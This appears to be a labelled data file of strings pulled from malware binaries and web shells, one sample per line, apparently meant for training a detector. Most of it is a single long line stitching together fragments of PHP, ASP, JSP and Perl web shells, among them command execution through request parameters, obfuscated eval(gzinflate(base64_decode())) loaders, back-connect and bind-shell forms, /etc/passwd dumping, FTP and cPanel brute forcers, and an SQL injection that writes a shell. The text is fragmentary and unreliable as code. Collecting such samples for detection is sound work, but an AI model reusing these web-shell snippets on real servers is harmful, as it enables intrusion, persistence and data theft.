1 varus_service_x86.dll/s %s /p %d /st %d /rt %dnet start %%1ping 127.1 > nulmcinitmispalertexsc start %%1net stop %%1workerrundnsapi.dllsoftware\\microsoft\\windows\\currentversion\\internet settings\\zonemap\\domains\\%sconnect %s:%d http/1.1connect %s:%d http/1.1mozilla/4.0 (compatible; msie 9.0; windows nt 6.1; trident/4.0;)iphlpapi.dll%systemroot%\\web\\proxy-authorization: negotiate %sclsid\\{%s}\\inprocserver32b_wkndnsk^rundll32 \"%s\",%s/c ping 127.%d & del \"%s\"runmebydll32s
1 http://www.wzpg.comipsearcher\\ipsearcher\\release\\ipsearcher.pdb_getaddressipsearcher.dlldojibiron by ronald huizer, (c) master#h4cker.us [%s]: found \"ftp account: anyone/anyone@any.net\" !!!%s@ftpscan#cracked account: %s/%s[%s]: found \"ftp account: %s/%s\" !!![>] ms11-08 exploit\\epathobj_exp\\x64\\release\\epathobj_exp.pdb-
1 arun_startuprun_rebootrun_directuninstallcmdshellsu expportscanykcai's shell[%d] failed, %08x[%d] offset can not fetchedwoqunimalegebi$info: this file is packed with the upx executable packer http://upx.sf.net $$id: upx 3.91 copyright (c) 1996-2013 the upx team. all rights reserved. $<
1 http://www.foundstone.com%s %s port %d. address is already in usew03a2409.dllr
1 http://hkmujj.co.cc--------
1 decodeproductkeystarthttpfloodcodekeymessageboxgetfilezillapasswordsdatainudpzsocketsr
1 [memloadlibrary] code : %i64xget http://%s:%d/images/%d.asmx?%spost http://%s:%d/service.asmx/%dcontent-type: appplication/octet-streamg
1 ongetpasswordphttp://www.chinesehack.org/global\\ps%08xstrstrastrtointanessus_get_socket_from_connection: fd <%d> is closed[*] \"%s\" completed, %d/%d/%d/%d:%d:%d - %d/%d/%d/%d:%d:%da fssniffer backdoor seems to be running on this port%s/churrasco/-->usage: churrasco.exe \"command to run\"/churrasco/-->done, command should have ran as system!mzkernel32.dllupackbydwing@e-mail : admin@luocong.comhomepage: http://www.luocong.com: %d - ustrreffix.dllultra string reference plugin v%d.%02dxscanlib.dllports/%s/%ddefault-tcp-portplugchecktcpportidttool.sysi
1 www.bing.com%s: http://%s%s/javascript/view.phptask %d failed %s,%dmozilla/4.0 (compatible; msie %d.0; [config]name = exe = cmd.exe\\cobra\\release\\cobra.pdb[name]object_id=[time][cw_local]system_pipeuser_pipe[transport]run_task_system[workdata]address1spstatusadaptablepost_fragpfsgrowperiodmicrosoft-windows-security-auditing4688appdata\\local\\temp\\rsys.exe7036rpc endpoint locator7045user mode serviceauto startg
1 http://%s/%s%u processor:memory (free/total): %d(mb)/ %d(mb) (use %d:\\buildsource\\9\\windowsclient\\windowsclient.client.rc\\binaries\\win32\\release dlphook\\*
1 [attempt-error] target %s - login \"%s\" - pass \"%s\" - child %d - %lu of %lu(description=(connect_data=(cid=(program=))(command=reload)(password=%s)(servicecn=^user^,cn=users,dc=foo,dc=bar,dc=com for domain foo.bar.commyblog:http://hi.baidu.com/0x24quser_namefromwwhered
\"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. 
we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? 
$cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? 
/bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . 
$directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' 
color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. 
- sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? 
echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... 
trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' 
<br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. 
x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? 
$_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . 
$_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . 
\" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of 
the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . 
1 c:\\windows\\temp\\pojie.exe /l=c:\\windows\\temp\\s.exec:\\windows\\temp\\s.exe tcp explorer.exe http://www.hackdos.comfailed to read file or invalid data in file!wtne / made by e compiler - wutao the interface of kernel library is invalid!eventvwrfailed to decompress data!notepad.exe result.txtgetlogons/showthread.php?t=156643sedebugnamevalueuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322software\\classes\\http\\shell\\open\\commandsystem\\controlset001\\services\\%sglobal\\%s-key-event%d%d.exeglobal\\%s-key-metuxget / http/1.1qy001id=%d;qy001guid=%s'sedebugprivilegeopen author: cyg07*2from golds7n[lag]'jdamageunhook iogetdeviceobjectpointer ok!\
1 http://www.vip80000.com/hot/index.htmlgetconnectstringcncert.safe.ssclone.dll(*.jpg;*.bmp;*.gif;*.ico;*.cur)|*.jpg;*.bmp;*.gif;*.ico;*.cur|jpgklock.dlle
1 connect %s:%i http/1.0cks=uthj@hadvpackhashtableget_isdisposedtripledestestmemory.frmmain.resources$
